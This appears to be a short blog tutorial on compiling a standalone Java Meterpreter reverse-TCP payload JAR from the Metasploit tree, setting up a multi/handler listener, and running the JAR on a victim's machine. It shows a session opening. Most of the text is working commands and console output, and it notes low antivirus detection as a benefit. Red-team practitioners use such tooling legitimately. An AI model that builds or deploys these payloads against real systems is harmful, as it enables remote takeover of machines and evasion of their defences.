Standalone Java Meterpreter


The documentation out there on the web is somewhat out-of-date when it comes to compiling and executing a standalone Java Meterpreter payload, and as it's yet to become part of the core features of the Metasploit framework , I expect these steps to change again in the future. In the past you could use loader.jar to run the payload, though this is no longer included in the tree - instead, compile your own, using (included in the tree):

Create the Meterpreter JAR:

cd ./external/source/javapayload/src/
javac -source 1.4 -target 1.4 metasploit/
echo -e "LHOST=\nLPORT=82" > metasploit.dat
jar cfe payload.jar metasploit.Payload metasploit/Payload.class metasploit.dat

Now to listen for the exploit in the Metasploit console:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp 
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 82
LPORT => 82
msf exploit(handler) > exploit

[*] Started reverse handler on 
[*] Starting the payload handler...

Launch the payload on the victim's machine:

java -jar payload.jar

Wait for the results:

[*] Sending stage (28541 bytes) to
[*] Meterpreter session 1 opened ( -> at 2012-03-21 09:53:20 +0000


  • AV detection is very low
  • Most boxes have Java installed
  • It works


  • Limited post exploitation modules can be run
  • Not as functional as a shell-code meterpreter session.